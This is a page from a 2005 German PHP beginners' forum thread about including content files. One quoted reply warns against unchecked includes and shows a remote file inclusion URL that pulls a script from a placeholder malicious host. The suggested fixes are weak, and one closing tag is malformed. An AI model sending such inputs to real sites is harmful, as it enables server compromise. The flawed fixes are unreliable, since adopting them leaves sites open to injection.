mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Mo 05.12.2016 21:47 Benutzername: Passwort: Auto-Login

Thema: [PHP NOOB braucht hilfe ] content includen? vom 09.01.2005


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Programmierung -> [PHP NOOB braucht hilfe ] content includen?
Seite: Zurück  1, 2, 3, 4, 5  Weiter
Autor Nachricht
Archibald Tuttle

Dabei seit: 08.01.2005
Ort: Informationsministerium
Alter: 46
Geschlecht: Männlich
Verfasst So 09.01.2005 18:36
Titel

Re: [PHP NOOB braucht hilfe ] content includen?

Antworten mit Zitat Zum Seitenanfang

daniel.ocean hat geschrieben:
content includen?


Auf Wiedersehen Mutter- und Vatersprache! *hu hu huu*
  View user's profile Private Nachricht senden
Account gelöscht


Ort: -
Alter: -
Verfasst So 09.01.2005 18:38
Titel

Antworten mit Zitat Zum Seitenanfang

Zitat:
suspicion breeds confidence
*Thumbs up!*
 
Anzeige
Anzeige
daynee

Dabei seit: 20.12.2002
Ort: NBG
Alter: 29
Geschlecht: Männlich
Verfasst So 09.01.2005 20:04
Titel

Antworten mit Zitat Zum Seitenanfang

pRiMUS hat geschrieben:
mit ungeprüft meinte er sowas wie

html_entity($var)

und/oder

if (file_exists($var))
include ($var);

denn wenn du sonst allow_url_fopen = 1 hast, dann könnte man bei dir sowas wie

index.php?page=http://www.boeseurl.com/totalboesesscript.php

machen und du hättest unter umständen ne menge ärger am pobbers.


Alternativ einfach nen Slash vor den Dateinamen setzen:
Code:
include "/".$page.".php";


Das mit dem file_exists(); würde aber eigentlich auch nich wirklich .. schützen, oder? * Ööhm... ja? *
  View user's profile Private Nachricht senden
dastef

Dabei seit: 03.11.2003
Ort: -
Alter: -
Geschlecht: Männlich
Verfasst So 09.01.2005 20:34
Titel

Antworten mit Zitat Zum Seitenanfang

zum thema file_exists:
Manual: Anmerkung: This function will not work on remote files as
the file to be examined must be accessible via the servers filesystem.

zum thema /datei.php
hast du alle sachen im root liegen bzw möchtest immer den kompletten
pfad in der url stehen haben? also ich nicht ...
  View user's profile Private Nachricht senden
minlove

Dabei seit: 02.12.2004
Ort: Aachen
Alter: 32
Geschlecht: Männlich
Verfasst Mo 10.01.2005 08:33
Titel

Antworten mit Zitat Zum Seitenanfang

aUDIOfREAK hat geschrieben:
zuerstmal musst du die html-datei in eine .php datei umbenennen.

dann einfach an der stelle wo du includen willst <? include "zuincludendedatei.php"; ?> - das wars auch schon *zwinker*


besser: <?php include "zuincludendedatei.inc.php"; ?php>
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
pRiMUS

Dabei seit: 09.09.2003
Ort: Vienna
Alter: 41
Geschlecht: Männlich
Verfasst Mo 10.01.2005 08:51
Titel

Antworten mit Zitat Zum Seitenanfang

was soll das .inc.php für einen sinn haben? *zwinker*
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
aUDIOfREAK

Dabei seit: 04.04.2002
Ort: Ansbach
Alter: 36
Geschlecht: Männlich
Verfasst Mo 10.01.2005 09:27
Titel

Antworten mit Zitat Zum Seitenanfang

pRiMUS hat geschrieben:
was soll das .inc.php für einen sinn haben? *zwinker*


eigentlich keinen näheren was die funktion betrifft. ich schätz mal das macht man halt allgemein so, das man dateien, die includet werden zur kennzeichnung mit .inc.php benennt...
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
minlove

Dabei seit: 02.12.2004
Ort: Aachen
Alter: 32
Geschlecht: Männlich
Verfasst Mo 10.01.2005 10:04
Titel

Antworten mit Zitat Zum Seitenanfang

pRiMUS hat geschrieben:
was soll das .inc.php für einen sinn haben? *zwinker*


ist sicherer: siehe hier!
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
 
Ähnliche Themen [PHP] UPDATE meinetabelle SET .... noob braucht hilfe
[flash] as-noob braucht hilfe für pendel-animation
[Frage] Wie PHP-Datei in HTML-Seite includen
[noob] Aufbau einer Galerie mit PHP
OOP in PHP für Noob - Formulardaten verarbeiten
[jsp] php in jsp-seite includen
Neues Thema eröffnen   Neue Antwort erstellen Seite: Zurück  1, 2, 3, 4, 5  Weiter
MGi Foren-Übersicht -> Programmierung


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.